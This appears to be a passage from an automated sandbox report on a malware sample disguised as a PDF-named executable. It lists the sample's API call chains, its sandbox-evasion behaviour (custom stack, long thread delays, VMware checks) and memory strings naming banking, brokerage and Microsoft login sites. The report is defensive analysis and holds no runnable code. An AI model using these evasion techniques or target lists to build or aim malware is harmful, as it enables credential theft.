                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_0075C4C7 push A30075BAh; retn 0075h0_2_0075C50D
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_00778945 push ecx; ret 0_2_00778958
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007548D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_007548D7
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007D5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_007D5376
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_00773187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00773187
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeAPI/Special instruction interceptor: Address: E85084
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597921Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597699Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597468Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597355Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597106Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596046Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595827Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595374Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595046Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594827Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594544Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594401Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594276Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594046Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8041Jump to behavior
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-102681
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeAPI coverage: 4.4 %
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007B445A GetFileAttributesW,FindFirstFileW,FindClose,0_2_007B445A
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007BC6D1 FindFirstFileW,FindClose,0_2_007BC6D1
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007BC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_007BC75C
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007BEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007BEF95
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007BF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_007BF0F2
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007BF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007BF3F3
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007B37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007B37EF
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007B3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_007B3B12
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007BBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_007BBCBC
                Source: C:\Users\user\Desktop\PK241200518-EMAIL RELEASE-pdf.exeCode function: 0_2_007549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_007549A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599672Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599562Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599453Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599343Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599234Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599125Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 599015Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598906Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598796Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598687Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598468Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598250Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598140Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 598031Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597921Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597699Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597578Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597468Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597355Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 597106Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596922Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596812Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596703Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 596046Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595827Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595593Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595484Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595374Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595265Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595046Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594937Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594827Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594718Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594544Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594401Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594276Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594156Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594046Jump to behavior
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.0000000003DD6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: RegSvcs.exe, 00000002.00000002.4554296392.00000000040F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
